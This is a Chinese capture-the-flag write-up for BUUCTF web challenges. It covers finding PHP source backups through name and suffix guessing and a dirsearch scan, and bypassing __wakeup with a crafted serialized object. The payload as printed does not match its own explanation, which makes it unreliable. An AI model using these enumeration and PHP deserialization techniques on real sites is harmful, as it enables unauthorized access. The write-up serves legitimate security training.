BUUCTF-Web方向16-20wp
[极客大寻衅 2019]PHP由内容提示应该存在源码备份,常见的如下,一个个尝试
后缀:tar tar.gz zip rar
名字:www web website backup back wwwroot temp访问www.zip,下载下来
https://track123.oss-cn-beijing.aliyuncs.com/20250220174516445.png
解压查看
https://track123.oss-cn-beijing.aliyuncs.com/20250220174537612.png
index.php
https://track123.oss-cn-beijing.aliyuncs.com/20250220172536850.png
flag.php
https://track123.oss-cn-beijing.aliyuncs.com/20250220172738961.png
class.php
结果如下
<?php
class Name{
private $username = 'admin';
private $password = 100;
}
$A=new Name();
echo serialize($A);
?>
[*]这里需要绕过__wakeup函数,而__wakeup函数存在一个特性,当成员属性数量大于实际数量时才可绕过wakeup
[*]由于序列化的存在空字符,故需要%00来代替,即空字符的url编码
O:4:"Name":2:{s:14:" Name username";s:5:"admin";s:14:" Name password";i:100;}拿到flag
https://track123.oss-cn-beijing.aliyuncs.com/20250220174043671.png
BackupFile
题目提示备份文件
后缀:tar tar.gz zip rar
名字:www web website backup back wwwroot temp除了以上这些,还有.bak/.swp/.old,都可以试试
这里使用dirsearch扫出来index.php.bak文件,下载下来
https://track123.oss-cn-beijing.aliyuncs.com/20250220182308042.png
使用记事本打开
页:
[1]